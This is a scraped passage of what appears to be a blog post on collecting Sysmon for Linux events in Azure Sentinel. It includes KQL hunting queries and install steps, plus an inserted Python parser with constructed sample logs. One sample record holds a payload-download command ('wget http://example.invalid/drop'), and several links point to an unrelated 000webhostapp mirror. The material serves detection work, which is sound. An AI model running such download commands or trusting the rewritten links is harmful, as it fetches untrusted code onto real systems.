data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">A summarized graphical threat view is also available under the Security Operations Efficiency tab:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_1-1634234806549.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317453iC1F4C1450D8E109B/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_1-1634234806549.png" alt="jessenkurien_1-1634234806549.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">If&nbsp;there are potential&nbsp;events observed from sources that are malicious, Azure Sentinel will alert you on the map like below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559685&quot;:720,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> 
<P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_2-1634234806560.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317454i14F5FD03C6927660/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_2-1634234806560.png" alt="jessenkurien_2-1634234806560.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Sysmon is supported by Azure Sentinel and the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel Information Model</SPAN></A> <SPAN data-contrast="auto">(ASim), which ensures Sysmon data is analyzed by the built-in analytics and is easy to query. Sysmon event collection must be enabled for parsing to work; it is configured with the following steps:</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="7" aria-setsize="-1" data-aria-posinset="1" data-aria-level="2"><SPAN data-contrast="auto">Configure </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog collection</SPAN></A><SPAN data-contrast="auto"> using the Log Analytics agent.</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="7" aria-setsize="-1" data-aria-posinset="2" data-aria-level="2"><SPAN data-contrast="auto">Deploy the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN 
data-contrast="none">Sysmon ASim parser pack</SPAN></A><SPAN data-contrast="auto">, or better yet, all </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASim</SPAN></A><SPAN data-contrast="auto"> parsers in a single package.</SPAN></LI> </UL> <P aria-level="1"><STRONG>Enriching the Investigation of an Alert:</STRONG></P> <P><SPAN data-contrast="auto">For example, let’s look at one of the alerts, </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘Possible Cryptocoinminer download detected’</SPAN></A><SPAN data-contrast="auto">, that we showed in the Incidents tab. This alert triggers on any cryptocoin-mining download activity observed in the network.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_3-1634234806553.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317455i862F0DD4BBAB148F/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_3-1634234806553.png" alt="jessenkurien_3-1634234806553.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">To investigate an alert like this using Azure Sentinel we need some of the events generated by Sysmon. Below are some of the events made available with Sysmon 
for Linux. Note that each event type you want must be enabled in the Sysmon config. More details on the steps can be found under the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OSSEM (Open Source Security Events Metadata) project</SPAN></A><SPAN data-contrast="auto">. For this blog, we have configured Sysmon to collect the Process Create and Network Connection events that we use below in a quick alert analysis.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><SPAN data-contrast="auto">1 – Process Create</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process creation event provides extended information about a newly created process.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">3 – Network Connect</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The network connection event logs TCP/UDP connections on the machine. 
The event also contains the source and destination host names, IP addresses, port numbers and IPv6 status.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">5 – Process Terminate</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process terminate event reports when a process terminates. It provides the UtcTime, ProcessGuid and ProcessId of the process.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">9 – Raw Access Read</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The RawAccessRead event detects when a process conducts reading operations from the drive using the \\.\ denotation. This technique is often used by malware for data exfiltration of files that are locked for reading, as well as to avoid file access auditing tools. 
The event indicates the source process and target device.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">10 – Process Access</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The process accessed event reports when a process opens another process, an operation that’s often followed by information queries or reading and writing the address space of the target process.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">11 – File Create</SPAN></LI> </UL> <P><SPAN data-contrast="auto">File create operations are logged when a file is created or overwritten. 
This event is useful for monitoring AutoStart locations, like the Startup folder, as well as temporary and download directories, which are common places malware drops during initial infection.</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><SPAN data-contrast="auto">23 – File Delete</SPAN></LI> </UL> <P><SPAN data-contrast="auto">A file was deleted. This event is helpful when attackers try to cover their tracks, and for finding anomalies on high-privilege monitoring machines.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Once the events are set up and being collected in Azure Sentinel, we can run a query like the one below to view all the process create logs recorded around the time of the alert. We can see the download related to crypto-mining activity along with other enumeration commands, which can be used to learn more about what the attackers did and reveal more details of the attack. You can always set the time span in the ‘Time Range’ column in Azure Sentinel.</SPAN></P> 
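The same investigation can be rehearsed offline on raw syslog lines. The Python below is an added example, not code from this post or from the Sysmon project: it parses constructed Sysmon for Linux syslog records (assuming the Event XML payload follows the `sysmon:` program tag), keeps truncated records visible instead of silently dropping them, and applies the one-minute alert window that the KQL join later in this post expresses with `between (TimeGenerated .. TimeWindow)`.

```python
"""Offline companion to the Sentinel queries in this post (added example, not
code from the post or the Sysmon project): parse Sysmon for Linux records out
of raw syslog lines and apply the same one-minute alert window that the KQL
join expresses with `between (TimeGenerated .. TimeWindow)`."""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Sysmon for Linux writes one Event XML document per syslog line after the
# "sysmon:" program tag; the regex only isolates that payload.
_SYSMON_PAYLOAD = re.compile(r"\bsysmon:\s*(<Event>.*)$", re.DOTALL)
_EVENT_ID = re.compile(r"<EventID>(\d+)</EventID>")


def parse_sysmon_line(line):
    """Return a record dict for a Sysmon syslog line, or None for any other line.

    A truncated payload (the syslog overrun / broken-XML problem that the
    FieldSizes config option exists to prevent) is not dropped silently: the
    record comes back with broken=True and whatever EventID is still readable.
    """
    m = _SYSMON_PAYLOAD.search(line)
    if not m:
        return None
    xml_text = m.group(1)
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        eid = _EVENT_ID.search(xml_text)
        return {"event_id": int(eid.group(1)) if eid else None, "computer": None,
                "utc_time": None, "broken": True, "fields": {}}
    system = root.find("System")
    fields = {d.get("Name"): (d.text or "") for d in root.iter("Data")}
    utc = datetime.strptime(fields["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
    return {"event_id": int(system.findtext("EventID")),
            "computer": system.findtext("Computer"),
            "utc_time": utc.replace(tzinfo=timezone.utc),
            "broken": False, "fields": fields}


def events_near_alert(records, compromised_entity, alert_time, event_id=1,
                      window=timedelta(minutes=1)):
    """Python equivalent of the post's KQL join: events of one type (default 1,
    ProcessCreate) on the compromised host whose UtcTime lies in
    [alert_time, alert_time + window]. Hostnames are compared
    case-insensitively, like toupper() on both sides of the query's join."""
    return [r for r in records
            if r is not None and not r["broken"] and r["event_id"] == event_id
            and r["computer"].upper() == compromised_entity.upper()
            and alert_time <= r["utc_time"] <= alert_time + window]


HOST = "ubuntu18ascsysmon"  # constructed lab hostname


def _event_line(utc, event_id, computer, **data):
    """Build a constructed syslog line in the shape Sysmon for Linux emits."""
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f"Oct 14 20:53:00 {computer} sysmon: <Event><System>"
            f'<Provider Name="Linux-Sysmon"/><EventID>{event_id}</EventID>'
            f"<Channel>Linux-Sysmon/Operational</Channel>"
            f"<Computer>{computer}</Computer></System><EventData>"
            f'<Data Name="UtcTime">{utc}</Data>{body}</EventData></Event>')


SAMPLE_SYSLOG = [  # constructed sample input, not real telemetry
    f"Oct 14 20:53:00 {HOST} systemd[1]: Started Session 7 of user azureuser.",
    _event_line("2021-10-14 20:53:10.000", 1, HOST, ProcessId="4242",
                Image="/usr/bin/wget",
                CommandLine="wget http://example.invalid/drop"),
    _event_line("2021-10-14 20:53:11.000", 3, HOST, ProcessId="4242",
                Image="/usr/bin/wget", SourceIp="10.0.0.4",
                DestinationIp="192.0.2.10", DestinationPort="80"),
    _event_line("2021-10-14 20:53:30.000", 1, HOST, ProcessId="4243",
                Image="/usr/bin/uname", CommandLine="uname -a"),
    _event_line("2021-10-14 20:58:00.000", 1, HOST, ProcessId="4300",
                Image="/usr/bin/sleep", CommandLine="sleep 60"),
    # Payload cut off mid-document, as a syslog line overrun would leave it.
    _event_line("2021-10-14 20:53:40.000", 1, HOST, ProcessId="4244",
                Image="/bin/bash", CommandLine="bash -c 'x' " * 20)[:180],
]


def investigate(lines=SAMPLE_SYSLOG, host=HOST,
                alert_time=datetime(2021, 10, 14, 20, 53, 0, tzinfo=timezone.utc)):
    """Command lines of ProcessCreate events within a minute of the alert, and
    the number of broken records the analyst should know were skipped."""
    records = [parse_sysmon_line(line) for line in lines]
    hits = events_near_alert(records, host, alert_time)
    broken = sum(1 for r in records if r is not None and r["broken"])
    return [r["fields"]["CommandLine"] for r in hits], broken


if __name__ == "__main__":
    commands, broken = investigate()
    print("in window:", commands, "| broken records skipped:", broken)
```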
<P>&nbsp;</P> <LI-CODE lang="kusto">vimProcessCreateLinuxSysmon
| where Computer =~ "UBUNTU18ASCSYSMON"
| summarize count() by Computer, CommandLine, Process</LI-CODE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_4-1634234806561.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317456i6D8608E60B36200C/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_4-1634234806561.png" alt="jessenkurien_4-1634234806561.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can also view the network connection logs around the timeline of the attack with the query below, to find the source of the attack and potential enumeration activity within the network. A similar approach can be taken to analyze attacker activity with the other log sources made available by Sysmon for Linux.</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="kusto">vimNetworkSessionLinuxSysmon
| where Computer =~ "UBUNTU18ASCSYSMON"
| summarize count() by Computer, Process, SrcIpAddr, DstIpAddr, Protocol</LI-CODE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="jessenkurien_1-1634239226618.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317486iF09CCD1B12105B6A/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_1-1634239226618.png" alt="jessenkurien_1-1634239226618.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you would like to look at logs recorded within a certain time span after or before the alert, a query like the one below can help in the analysis. In the query below we join the ‘Possible Cryptocoinminer download detected’ alert with the Process Create Linux Sysmon logs to reveal activity that occurred within 1 minute of the alert (both hostnames are upper-cased so the join is case-insensitive). A query like this can be applied to other alerts and log sources as well to investigate the incidents shown earlier under the Incidents tab.</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="kusto">SecurityAlert
| where AlertName == "Possible Cryptocoinminer download detected"
| summarize count() by WorkspaceSubscriptionId, CompromisedEntity = toupper(CompromisedEntity), TimeGenerated, AlertName
| join kind=inner (
    vimProcessCreateLinuxSysmon
    | project Computer = toupper(Computer), Timespan = TimeGenerated, CommandLine, Process
  ) on $left.CompromisedEntity == $right.Computer
| extend TimeWindow = TimeGenerated + 1m
| where Timespan between (TimeGenerated .. TimeWindow)
| project TimeWindow, CompromisedEntity, AlertName, CommandLine, Process</LI-CODE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="jessenkurien_6-1634234806562.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317458iD5CAA84499C3903E/image-size/large?v=v2&amp;px=999" role="button" title="jessenkurien_6-1634234806562.png" alt="jessenkurien_6-1634234806562.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In our next blog post we will cover how to use Sysmon for Linux to look for a specific MITRE ATT&amp;CK technique and what that looks like in Azure Sentinel. 
Please also refer to our blog post covering <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054" target="_self">Sentinel 2 Go and how to set up Sysmon for Linux</A> with it.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">To conclude, the release of this tool is a significant step not only for the Linux open-source community but also in the effort to combat the rising sophistication of attacks on Linux systems.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As you start using and testing the Sysmon for Linux tool, we encourage you to provide feedback, along with details, on the <A href="#" target="_self">Sysinternals GitHub</A> page. Your feedback is critical to Microsoft's mission of building better protection and defense against cyber criminals.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">References &amp; Relevant Reading:</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="8" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysinternals Utilities 
- Windows Sysinternals&nbsp;</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="8" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What is Azure Sentinel? | Microsoft Docs</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel:(github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Reference table for all security alerts in Azure Security Center</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:257}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:2,&quot;335559685&quot;:240,&quot;335559738&quot;:270,&quot;335559739&quot;:135,&quot;335559740&quot;:330}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">&nbsp;</SPAN> <SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> Thu, 14 Oct 2021 20:53:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/a-quick-guide-on-using-sysmon-for-linux-in-azure-sentinel/ba-p/2847305 jessenkurien 2021-10-14T20:53:18Z Automating the deployment of Sysmon for Linux 🐧 and Azure Sentinel in a lab environment 🧪 https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054 <P><SPAN data-contrast="auto"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Blog-page.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317433i969852CF86E8D694/image-size/large?v=v2&amp;px=999" role="button" title="Blog-page.png" alt="Blog-page.png" /></span></SPAN></P> <P><EM><SPAN>Thanks to Kevin Sheldrake, Russell McDonald, Jessen Kurien and Ofer Shezaf for making this blog possible.</SPAN></EM></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Today, we celebrate&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/windows-events/sysinternals-25-a-special-anniversary-event/ev-p/2787286" target="_blank" rel="noopener"><SPAN data-contrast="none">25 years of Sysinternals</SPAN></A><SPAN data-contrast="auto">,&nbsp;a set of utilities to analyze, troubleshoot and optimize Windows systems and applications.&nbsp;Also,&nbsp;as part of this special anniversary,&nbsp;we are&nbsp;releasing&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Sysmon for Linux</SPAN></STRONG><SPAN data-contrast="auto">,&nbsp;an open-source&nbsp;system monitor tool&nbsp;developed&nbsp;to collect security events&nbsp;from Linux environments&nbsp;using&nbsp;eBPF (</SPAN><SPAN data-contrast="none">Extended Berkeley Packet Filter)&nbsp;and</SPAN><SPAN 
data-contrast="auto">&nbsp;sending&nbsp;them to Syslog&nbsp;for easy consumption.&nbsp;Sysmon for Linux is built on&nbsp;a&nbsp;library also released today named <A href="#" target="_self">sysinternalsEBPF</A> which is built on&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">libbpf</SPAN></A><SPAN data-contrast="auto">&nbsp;including a library of eBPF inline functions used as helpers.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In this post, I will show you how to automatically deploy a research lab environment with&nbsp;an&nbsp;Azure&nbsp;Sentinel&nbsp;instance and&nbsp;a&nbsp;few Linux virtual machines&nbsp;with Sysmon for Linux&nbsp;already&nbsp;installed and configured to&nbsp;take it for&nbsp;a&nbsp;drive and explore&nbsp;its&nbsp;coverage.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As always, before getting into the technical parts of the main topics,&nbsp;it&nbsp;is&nbsp;important&nbsp;to understand some of the fundamental concepts behind Sysmon for Linux.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="1">&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What is eBPF?</SPAN></FONT></H2> <P><SPAN data-contrast="none">According to the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">eBPF Foundation</SPAN></A><SPAN data-contrast="none">,&nbsp;eBPF is a technology&nbsp;that&nbsp;allows programs to&nbsp;run&nbsp;in a sandbox&nbsp;in an operating system kernel.&nbsp;In other words,&nbsp;eBPF enables programmers to write code which gets executed in kernel space in a more secure and restricted&nbsp;way&nbsp;in order to add&nbsp;additional capabilities to the operating system at runtime.&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN 
data-contrast="none">Some of the use cases for eBPF are:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="none">Security</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Combining visibility and&nbsp;better level of control&nbsp;to secure systems.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="none">Tracing&nbsp;and profiling</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Powerful and unique insights to troubleshoot system performance.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><STRONG><SPAN data-contrast="none">Networking</SPAN></STRONG><SPAN data-contrast="none">: A natural fit for all packet processing requirements of networking solutions.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="22" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><STRONG><SPAN data-contrast="none">Observability and monitoring</SPAN></STRONG><SPAN data-contrast="none">:&nbsp;Collection and in-kernel aggregation of custom metrics.</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Why eBPF for Sysmon for Linux?</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">From an event-tracing perspective,&nbsp;eBPF allows us to&nbsp;write event-driven programs and&nbsp;have pre-defined&nbsp;hooks into&nbsp;operations such as system calls, network&nbsp;connections,&nbsp;file write/read, etc. We can then&nbsp;collect those events and&nbsp;use them to understand adversary behavior&nbsp;during research or an investigation.&nbsp;As mentioned before, Sysmon for Linux uses&nbsp;its own library “sysinternalsEBPF” to handle the security events monitoring&nbsp;process.</SPAN></P> <P><SPAN>&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1634229152075.png" style="width: 911px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317395i91F2592563825D25/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1634229152075.png" alt="Cyb3rWard0g_0-1634229152075.png" /></span></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">You can find more information about&nbsp;the implementation of the new sysinternals EBPF library in the following resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="19" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">EBPF Summit: Auto-discovery of Kernel Struct Offsets without BTF – Kevin Sheldrake, Microsoft</SPAN><SPAN>&nbsp;</SPAN></A></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Installing Sysmon for Linux</SPAN><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">All the information presented here about the installation is available in the projects' own GitHub repositories:</SPAN></P> <UL> <LI><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">SysinternalsEBPF/INSTALL.md at main · Sysinternals/SysinternalsEBPF (github.com)</A></SPAN></LI> <LI><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">SysmonForLinux/INSTALL.md at main · Sysinternals/SysmonForLinux (github.com)</A></SPAN></LI> </UL> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Register Microsoft Key and Feed</SPAN></FONT></H3> <P><SPAN data-contrast="none">Sysmon for Linux requires the following packages during installation:</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="none">sysinternalsebpf (.DEB or .RPM)</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="20" aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><SPAN data-contrast="none">sysmonforlinux (.DEB or .RPM)</SPAN></LI> </UL> <P><SPAN data-contrast="none">For example, on Ubuntu you can run the following to register the Microsoft package feed (more examples are in the INSTALL documents above):</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="bash">wget -q https://packages.microsoft.com/config/ubuntu/$(lsb_release -rs)/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb</LI-CODE> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Install Packages</SPAN></FONT></H3> <P><SPAN data-contrast="none">Depending on the Linux distribution and package manager, you can use the </SPAN><STRONG><SPAN data-contrast="none">apt</SPAN></STRONG><SPAN data-contrast="none"> dependency resolver (Debian-based distros) or the </SPAN><STRONG><SPAN data-contrast="none">RPM</SPAN></STRONG><SPAN data-contrast="none"> package manager (Fedora-based distros).</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">Following the Ubuntu example, run the following commands to install <STRONG>sysinternalsEBPF</STRONG> and <STRONG>Sysmon</STRONG>, in that order:</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo apt-get update
sudo apt-get install sysinternalsebpf
sudo apt-get install sysmonforlinux</LI-CODE> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Next, you should be able to run the </SPAN><STRONG><SPAN data-contrast="auto">sysmon</SPAN></STRONG><SPAN data-contrast="auto"> command:</SPAN></P> <P>&nbsp;</P> <LI-CODE lang="bash">sysmon -h</LI-CODE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1634229152079.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317396i2E7AC23824EF1A63/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1634229152079.png" alt="Cyb3rWard0g_1-1634229152079.png" /></span></P> 
